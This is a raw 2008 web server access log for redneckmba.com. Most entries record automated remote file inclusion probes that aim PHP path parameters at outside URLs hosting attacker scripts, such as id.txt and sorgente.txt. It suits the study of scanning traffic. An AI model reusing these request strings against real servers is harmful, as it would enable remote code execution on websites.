98.193.117.182 - - [16/Nov/2008:20:44:03 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "redneckmba.com"
98.193.117.182 - - [16/Nov/2008:20:44:08 -0800] "GET /logs/access.log/akocomments.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "redneckmba.com"
98.193.117.182 - - [16/Nov/2008:20:44:08 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "redneckmba.com"
124.139.67.70 - - [16/Nov/2008:20:46:30 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "redneckmba.com"
124.139.67.70 - - [16/Nov/2008:20:46:30 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "redneckmba.com"
124.139.67.70 - - [16/Nov/2008:20:46:31 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "redneckmba.com"
76.13.114.107 - - [16/Nov/2008:20:47:06 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
201.30.20.130 - - [16/Nov/2008:20:48:11 -0800] "GET /logs/access.log%20%20///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
201.30.20.130 - - [16/Nov/2008:20:48:11 -0800] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
201.30.20.130 - - [16/Nov/2008:20:48:11 -0800] "GET /logs///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
81.226.217.113 - - [16/Nov/2008:20:49:24 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "redneckmba.com"
81.226.217.113 - - [16/Nov/2008:20:49:24 -0800] "GET /logs/access.log/akocomments.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "redneckmba.com"
81.226.217.113 - - [16/Nov/2008:20:49:29 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "redneckmba.com"
65.182.184.197 - - [16/Nov/2008:20:50:45 -0800] "GET /logs/access_080825.log/s_loadenv.inc.php?DOCUMENT_ROOT=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
65.182.184.197 - - [16/Nov/2008:20:50:45 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
65.182.184.197 - - [16/Nov/2008:20:50:46 -0800] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
65.182.184.197 - - [16/Nov/2008:20:51:06 -0800] "GET /logs/access_080908.log/s_loadenv.inc.php?DOCUMENT_ROOT=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
203.86.233.109 - - [16/Nov/2008:20:52:23 -0800] "GET /logs/access.log/?sourcedir=http://cs.fatguyhosting.com/images/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
203.86.233.109 - - [16/Nov/2008:20:52:24 -0800] "GET /logs/access.log/?sourcedir=http://cs.fatguyhosting.com/images/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
203.86.233.109 - - [16/Nov/2008:20:52:24 -0800] "GET /?sourcedir=http://cs.fatguyhosting.com/images/idxx.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.redneckmba.com"
203.86.233.109 - - [16/Nov/2008:20:52:24 -0800] "GET /?sourcedir=http://cs.fatguyhosting.com/images/idxx.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.redneckmba.com"
203.86.233.109 - - [16/Nov/2008:20:52:24 -0800] "GET /logs/?sourcedir=http://cs.fatguyhosting.com/images/idxx.txt??? HTTP/1.1" 200 1939 "-" "libwww-perl/5.803" "www.redneckmba.com"
203.86.233.109 - - [16/Nov/2008:20:52:25 -0800] "GET /logs/?sourcedir=http://cs.fatguyhosting.com/images/idxx.txt??? HTTP/1.1" 200 1939 "-" "libwww-perl/5.803" "www.redneckmba.com"
72.29.65.73 - - [16/Nov/2008:20:53:13 -0800] "GET /admin/sidebar.php?db=http://abesco.net/slpw/email/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "redneckmba.com"
12.172.123.235 - - [16/Nov/2008:20:53:16 -0800] "GET /admin/sidebar.php?db=http://abesco.net/slpw/email/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
201.30.20.130 - - [16/Nov/2008:20:53:28 -0800] "GET /logs/access.log///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
216.19.215.21 - - [16/Nov/2008:20:53:39 -0800] "GET /admin/sidebar.php?db=http://abesco.net/slpw/email/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "redneckmba.com"
76.13.123.194 - - [16/Nov/2008:20:55:21 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
216.19.215.21 - - [16/Nov/2008:20:56:44 -0800] "GET /logs/access.log/admin/sidebar.php?db=http://abesco.net/slpw/email/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "redneckmba.com"
216.19.215.21 - - [16/Nov/2008:20:56:44 -0800] "GET /admin/sidebar.php?db=http://abesco.net/slpw/email/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "redneckmba.com"
216.19.215.21 - - [16/Nov/2008:20:56:44 -0800] "GET /logs/admin/sidebar.php?db=http://abesco.net/slpw/email/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "redneckmba.com"
72.29.65.73 - - [16/Nov/2008:20:57:01 -0800] "GET /logs/access.log/admin/sidebar.php?db=http://abesco.net/slpw/email/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "redneckmba.com"
72.29.65.73 - - [16/Nov/2008:20:57:01 -0800] "GET /admin/sidebar.php?db=http://abesco.net/slpw/email/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "redneckmba.com"
72.29.65.73 - - [16/Nov/2008:20:57:01 -0800] "GET /logs/admin/sidebar.php?db=http://abesco.net/slpw/email/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "redneckmba.com"
66.163.171.206 - - [16/Nov/2008:20:57:43 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
81.116.66.244 - - [16/Nov/2008:20:57:48 -0800] "GET /admin/sidebar.php?db=http://abesco.net/slpw/email/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
87.104.34.212 - - [16/Nov/2008:20:57:52 -0800] "GET /admin/sidebar.php?db=http://abesco.net/slpw/email/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "redneckmba.com"
208.69.123.58 - - [16/Nov/2008:20:59:14 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "redneckmba.com"
208.69.123.58 - - [16/Nov/2008:20:59:14 -0800] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "redneckmba.com"
208.69.123.58 - - [16/Nov/2008:20:59:14 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "redneckmba.com"
12.172.123.235 - - [16/Nov/2008:20:59:24 -0800] "GET /logs/access.log/admin/sidebar.php?db=http://abesco.net/slpw/email/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
12.172.123.235 - - [16/Nov/2008:20:59:24 -0800] "GET /admin/sidebar.php?db=http://abesco.net/slpw/email/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
12.172.123.235 - - [16/Nov/2008:20:59:24 -0800] "GET /logs/admin/sidebar.php?db=http://abesco.net/slpw/email/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
87.104.34.212 - - [16/Nov/2008:20:59:32 -0800] "GET /logs/access.log/admin/sidebar.php?db=http://abesco.net/slpw/email/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "redneckmba.com"
87.104.34.212 - - [16/Nov/2008:20:59:32 -0800] "GET /admin/sidebar.php?db=http://abesco.net/slpw/email/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "redneckmba.com"
87.104.34.212 - - [16/Nov/2008:20:59:32 -0800] "GET /logs/admin/sidebar.php?db=http://abesco.net/slpw/email/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "redneckmba.com"
208.69.123.58 - - [16/Nov/2008:21:00:50 -0800] "GET /logs/access.log/convert/mvcw.php?step=1&vwar_root=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "redneckmba.com"
208.69.123.58 - - [16/Nov/2008:21:00:50 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "redneckmba.com"
208.69.123.58 - - [16/Nov/2008:21:00:50 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "redneckmba.com"
208.69.123.58 - - [16/Nov/2008:21:00:51 -0800] "GET /convert/mvcw.php?vwar_root=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "redneckmba.com"
208.69.123.58 - - [16/Nov/2008:21:00:51 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "redneckmba.com"
208.69.123.58 - - [16/Nov/2008:21:00:51 -0800] "GET /logs/access.log/convert/mvcw.php?vwar_root=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "redneckmba.com"
201.30.20.130 - - [16/Nov/2008:21:02:40 -0800] "GET /admin/sidebar.php?db=http://www.romanianharvest.ro//components/id2? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "redneckmba.com"
201.30.20.130 - - [16/Nov/2008:21:02:41 -0800] "GET /admin/sidebar.php?db=http://www.albalactanciamaterna.info//modules/Forums/admin/id2? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "redneckmba.com"
87.106.16.18 - - [16/Nov/2008:21:02:47 -0800] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.dhammajak.net/guestbook/admin/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "redneckmba.com"
87.106.16.18 - - [16/Nov/2008:21:02:47 -0800] "GET /config/dbutil.bck.php?confdir=http://www.dhammajak.net/guestbook/admin/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "redneckmba.com"
87.106.16.18 - - [16/Nov/2008:21:02:47 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://www.dhammajak.net/guestbook/admin/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "redneckmba.com"
208.69.123.58 - - [16/Nov/2008:21:02:51 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
208.69.123.58 - - [16/Nov/2008:21:02:51 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
208.69.123.58 - - [16/Nov/2008:21:02:51 -0800] "GET /logs/access.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
217.111.67.5 - - [16/Nov/2008:21:04:34 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.dhammajak.net/guestbook/admin/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
217.111.67.5 - - [16/Nov/2008:21:04:34 -0800] "GET /logs/access.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.dhammajak.net/guestbook/admin/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
217.111.67.5 - - [16/Nov/2008:21:04:34 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.dhammajak.net/guestbook/admin/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
66.40.52.29 - - [16/Nov/2008:21:06:15 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.geocities.com/tutimasripah/ide.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.redneckmba.com"
66.40.52.29 - - [16/Nov/2008:21:06:15 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.geocities.com/tutimasripah/ide.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.redneckmba.com"
87.106.16.18 - - [16/Nov/2008:21:06:41 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://www.dhammajak.net/guestbook/admin/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
87.106.16.18 - - [16/Nov/2008:21:06:41 -0800] "GET /config/dbutil.bck.php?confdir=http://www.dhammajak.net/guestbook/admin/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
208.69.123.58 - - [16/Nov/2008:21:07:11 -0800] "GET /logs/access.log%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
66.40.52.29 - - [16/Nov/2008:21:07:17 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.geocities.com/tutimasripah/ide.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "redneckmba.com"
66.40.52.29 - - [16/Nov/2008:21:07:17 -0800] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.geocities.com/tutimasripah/ide.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "redneckmba.com"
66.40.52.29 - - [16/Nov/2008:21:07:18 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.geocities.com/tutimasripah/ide.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "redneckmba.com"
217.172.178.237 - - [16/Nov/2008:21:07:22 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.redneckmba.com"
66.40.52.29 - - [16/Nov/2008:21:07:26 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.geocities.com/tutimasripah/ide.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "redneckmba.com"
66.40.52.29 - - [16/Nov/2008:21:07:26 -0800] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.geocities.com/tutimasripah/ide.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "redneckmba.com"
66.40.52.29 - - [16/Nov/2008:21:07:26 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.geocities.com/tutimasripah/ide.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "redneckmba.com"
217.172.178.237 - - [16/Nov/2008:21:07:45 -0800] "GET /logs/access.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.redneckmba.com"
217.172.178.237 - - [16/Nov/2008:21:07:46 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.redneckmba.com"
217.172.178.237 - - [16/Nov/2008:21:07:46 -0800] "GET /logs/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.redneckmba.com"
66.40.52.29 - - [16/Nov/2008:21:11:08 -0800] "GET /logs/access.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
66.40.52.29 - - [16/Nov/2008:21:11:08 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
66.40.52.29 - - [16/Nov/2008:21:11:20 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.geocities.com/tutimasripah/ide.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.redneckmba.com"
87.106.16.18 - - [16/Nov/2008:21:11:39 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dhammajak.net/guestbook/admin/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
87.106.16.18 - - [16/Nov/2008:21:11:39 -0800] "GET /logs/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dhammajak.net/guestbook/admin/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
87.106.16.18 - - [16/Nov/2008:21:11:39 -0800] "GET /logs/access.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dhammajak.net/guestbook/admin/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
66.40.52.29 - - [16/Nov/2008:21:11:42 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.geocities.com/tutimasripah/ide.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.redneckmba.com"
66.40.52.29 - - [16/Nov/2008:21:12:01 -0800] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "redneckmba.com"
66.40.52.29 - - [16/Nov/2008:21:12:01 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "redneckmba.com"
66.40.52.29 - - [16/Nov/2008:21:12:01 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "redneckmba.com"
217.111.67.5 - - [16/Nov/2008:21:12:05 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dhammajak.net/guestbook/admin/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
217.111.67.5 - - [16/Nov/2008:21:12:05 -0800] "GET /logs/access.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dhammajak.net/guestbook/admin/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
217.111.67.5 - - [16/Nov/2008:21:12:05 -0800] "GET /logs/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dhammajak.net/guestbook/admin/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
195.12.53.176 - - [16/Nov/2008:21:12:24 -0800] "GET /logs/errors.php?error=http://www.geocities.com/rinaputria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "redneckmba.com"
195.12.53.176 - - [16/Nov/2008:21:12:24 -0800] "GET /errors.php?error=http://www.geocities.com/rinaputria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "redneckmba.com"
66.40.52.29 - - [16/Nov/2008:21:13:41 -0800] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.redneckmba.com"
66.40.52.29 - - [16/Nov/2008:21:13:41 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.redneckmba.com"
66.40.52.29 - - [16/Nov/2008:21:13:41 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.redneckmba.com"
81.116.66.244 - - [16/Nov/2008:21:13:43 -0800] "GET /logs/access.log/admin/sidebar.php?db=http://abesco.net/slpw/email/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
81.116.66.244 - - [16/Nov/2008:21:13:44 -0800] "GET /admin/sidebar.php?db=http://abesco.net/slpw/email/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
81.116.66.244 - - [16/Nov/2008:21:13:44 -0800] "GET /logs/admin/sidebar.php?db=http://abesco.net/slpw/email/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
84.21.71.133 - - [16/Nov/2008:21:14:47 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
84.21.71.133 - - [16/Nov/2008:21:14:47 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
80.66.192.102 - - [16/Nov/2008:21:17:23 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.redneckmba.com"
66.40.52.29 - - [16/Nov/2008:21:18:15 -0800] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
66.40.52.29 - - [16/Nov/2008:21:18:15 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.114.107 - - [16/Nov/2008:21:19:06 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
217.172.178.237 - - [16/Nov/2008:21:24:30 -0800] "GET /logs/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.redneckmba.com"
217.172.178.237 - - [16/Nov/2008:21:24:30 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.redneckmba.com"
211.206.124.42 - - [16/Nov/2008:21:26:58 -0800] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
211.206.124.42 - - [16/Nov/2008:21:26:58 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
211.206.124.42 - - [16/Nov/2008:21:26:58 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
217.172.178.237 - - [16/Nov/2008:21:27:15 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "redneckmba.com"
202.74.164.79 - - [16/Nov/2008:21:27:31 -0800] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
202.74.164.79 - - [16/Nov/2008:21:27:31 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
195.12.53.176 - - [16/Nov/2008:21:28:42 -0800] "GET /logs/index.php?redir=http://www.geocities.com/arifferoza/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "redneckmba.com"
195.12.53.176 - - [16/Nov/2008:21:28:42 -0800] "GET /index.php?redir=http://www.geocities.com/arifferoza/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "redneckmba.com"
121.78.225.23 - - [16/Nov/2008:21:30:18 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "redneckmba.com"
202.74.164.79 - - [16/Nov/2008:21:30:49 -0800] "GET /logs/access.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
